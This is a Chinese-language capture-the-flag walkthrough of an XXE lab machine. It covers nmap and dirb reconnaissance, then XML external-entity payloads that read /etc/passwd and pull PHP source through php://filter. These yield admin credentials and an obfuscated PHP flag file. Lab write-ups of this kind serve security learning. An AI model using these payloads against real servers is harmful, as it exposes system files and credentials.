将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机
使用nmap进行主机发现,获取靶机IP地址
nmap 192.168.47.1-254 kali本机ip
根据对比可知XXE的一个ip地址为192.168.134.134,并开放了80端口
在浏览器访问http://192.168.134.134
对网站进行目录和文件扫描
dirb http://192.168.134.134
发现有index.html和robots.txt
进入网站进行查询
发现存在用户登录的一个界面
进入用户登录界面
尝试登录并用Burpsuite抓包
通过抓包发现是XML数据提交
利用外部实体注入读取用户的账户文件
<!DOCTYPE r [<!ENTITY admin SYSTEM "file:///etc/passwd"> ]>
<root><name>&admin;</name><password>1</password></root>
继续通过php://filter读取admin.php的文件源码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&admin;</name><password>admin</password></root>
进行base64解码
得到用户名和密码,经过分析可知密码是通过MD5格式加密的
得到账号密码administhebest,admin@123
进入http://192.168.134.134/xxe/admin.php进行登录
进入这个网站
进行抓包读取fiagmeout.php
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>
进行base64解码
JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ
对得到的flag进行编码
得到flag.php
使用Burpsuite进行读取flag.php
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
再进行编码
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);